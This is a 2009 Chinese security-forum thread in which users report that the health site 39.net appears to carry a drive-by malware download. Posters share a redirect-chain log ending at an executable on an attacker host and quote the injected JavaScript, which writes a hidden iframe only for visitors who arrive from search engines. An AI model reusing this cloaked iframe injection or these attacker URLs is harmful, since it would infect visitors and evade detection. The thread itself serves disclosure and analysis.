39.net疑似被植入恶意木马 上万用户中招 挂马BY;taoyuan237

王子带着刀

我帮朋友所发，他就一个360安全卫士都拦截

我的红伞P都没有报毒   他说直接进去不报毒，百度搜索进去才报

hxxp://www.baidu.com/s?ie=gb2312&bs=var+p%3Durl.toLowerCase%28%29.indexOf%28+www.baidu.com+%29%3B&sr=&z=&cl=3&f=8&wd=http%3A%2F%2Fsex.39.net%2Fxxl%2Ffqxxl%2F084%2F2%2F278466.html&ct=0  
再点第一个进去 360拦截木马  



[ 本帖最后由 taoyuan237 于 2009-7-25 17:10 编辑 ]

einnawy

瑞星报了

gtyre1

瑞星报的截个图来看下、、

taoyuan237

关于:hxxp://sex.39.net/xxl/fqxxl/084/2/278466.html解密的日志(全体输出 -  31):

Level  0>http://sex.39.net/xxl/fqxxl/084/2/278466.html
Level  1>http://images.39.net/sex/js/art_sex.js
Level  2>http://disk.e165.com/new.js
Level  3>http://fdsa332dd.3322.org/ok/06.htm?03
Level  4>http://js.tongji.linezing.com/1213759/tongji.js
Level  4>http://fdsa332dd.3322.org/ok/fdsgfdsgrre44556431.html
Level  5>http://fdsa332dd.3322.org/ok/jhgftrdsa.htm
Level  6>http://55566884.3322.org/alg.exe
Level  5>http://fdsa332dd.3322.org/ok/gfddtt.htm
Level  6>http://fdsa332dd.3322.org/ok/go1.jpg
Level  6>http://fdsa332dd.3322.org/ok/go.jpg
Level  7>http://55566884.3322.org/alg.exe
Level  1>http://image.39.net/js/art_ok.js
Level  1>http://39net.datamaster.com.cn/dma.js?4713144b849e6
Level  1>http://image.39.net/js/function.js
Level  1>http://images.39.net/js/art_tips.js
Level  1>http://app-g.39.net/rel/k13.php?adid=77
Level  1>http://images.39.net/js/google/google_art_360_gy.js
Level  1>http://dpvc.39.net/adpolestar/lgs/door
Level  1>http://cpro.baidu.com/cpro/ui/cp.js
Level  1>http://images.39.net/js/baidu/baidu_art_360_1.js
Level  1>http://images.39.net/js/google/google_art_360_120.js
Level  1>http://app-g.39.net/rel/k13.php?adid=2
Level  1>http://dpvc.39.net/adpolestar/door
Level  1>http://app-g.39.net/rel/k13.php?adid=45
Level  1>http://app-g.39.net/rel/k13.php?adid=37
Level  1>http://app-g.39.net/rel/k13.php?adid=38
Level  1>http://comment-js.39.net/article/2784/278466.js
Level  1>http://comment-js.39.net/comment.js
Level  1>http://app-g.39.net/rel/k13.php?adid=34
Level  1>http://app-g.39.net/rel/k13.php?adid=103

日志由 Redoce2.0第13次修正版于 2009/7/25 17:09:16 生成。
挂的比较隐蔽

[ 本帖最后由 taoyuan237 于 2009-7-25 17:10 编辑 ]

250662772

原帖由 王子带着刀 于 2009-7-25 16:54 发表
我帮朋友所发，他就一个360安全卫士都拦截

我的红伞P都没有报毒   他说直接进去不报毒，百度搜索进去才报

hxxp://www.baidu.com/s?ie=gb2312&bs=var+p%3Durl.toLowerCase%28%29.indexOf%28+w ...

只要是从下面的搜索进去的都会执行挂马,某则不会执行.

var url=document.referrer;
var p=url.toLowerCase().indexOf("www.baidu.com","search.cn.yahoo.com","www.soso.com","search.114.vnet.cn","zhidao.baidu.com","seek.3721.com","www.sogou.com","www.google.cn");
if (p>0)
{
document.writeln("<iframe src=http:\/\/fdsa332dd.3322.org\/ok\/06.htm?03 width=111 height=0 border=0><\/iframe>");
}

llzy3575

原帖由 250662772 于 2009-7-25 21:10 发表
只要是从下面的搜索进去的都会执行挂马,某则不会执行.